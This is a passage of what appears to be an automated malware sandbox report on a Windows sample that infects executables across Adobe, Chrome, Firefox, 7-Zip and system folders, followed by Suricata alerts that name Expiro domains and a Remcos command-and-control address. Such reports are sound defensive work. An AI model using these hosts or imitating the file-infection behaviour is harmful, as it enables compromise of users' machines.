              Source: Binary string: ALG.pdbGCTL source: svchost.exe, 00000006.00000003.1854023776.0000000005890000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: svchost.exe, 00000006.00000003.1892510705.0000000005750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3178209395.0000000001470000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: svchost.exe, 00000006.00000003.1987958380.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1978746407.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: svchost.exe, 00000006.00000003.2193636183.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdbX source: svchost.exe, 00000006.00000003.2024944125.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: svchost.exe, 00000006.00000003.2602531162.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdb source: svchost.exe, 00000006.00000003.2004063369.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: svchost.exe, 00000006.00000003.2438532554.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: svchost.exe, 00000006.00000003.2393262607.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: svchost.exe, 00000006.00000003.2602531162.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBIEnloh source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00452492
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00442886
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_004788BD
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,1_2_004339B6
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,1_2_0045CAFA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00431A86
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,1_2_0044BD27
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0045DE8F FindFirstFileW,FindClose,1_2_0045DE8F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0044BF8B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00452492
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00442886
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_004788BD
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,3_2_004339B6
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,3_2_0045CAFA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00431A86
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,3_2_0044BD27
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0045DE8F FindFirstFileW,FindClose,3_2_0045DE8F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0044BF8B
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:63580 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49733 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:50853 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49774 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49769 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49766 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49739 -> 172.234.222.143:80
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49735
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49735
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49736
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49736
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49745
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49745
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49804 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49761 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49744 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49790
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49730 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49752 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49762 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49790
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:57533 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.4:49835
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49771 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49783 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.4:49835
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49845 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49772 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49789
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49789
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:49249 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.4:49828
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.4:49828
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49883
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49883
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49823 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49912 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49933 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.4:49872
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.4:49872
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49758 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49871 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49956 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.213.104.86:80 -> 192.168.2.4:49966
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49891 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49764 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.213.104.86:80 -> 192.168.2.4:49966
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49998 -> 18.208.156.248:80
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.4:49963
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49978 -> 204.10.160.212:6622
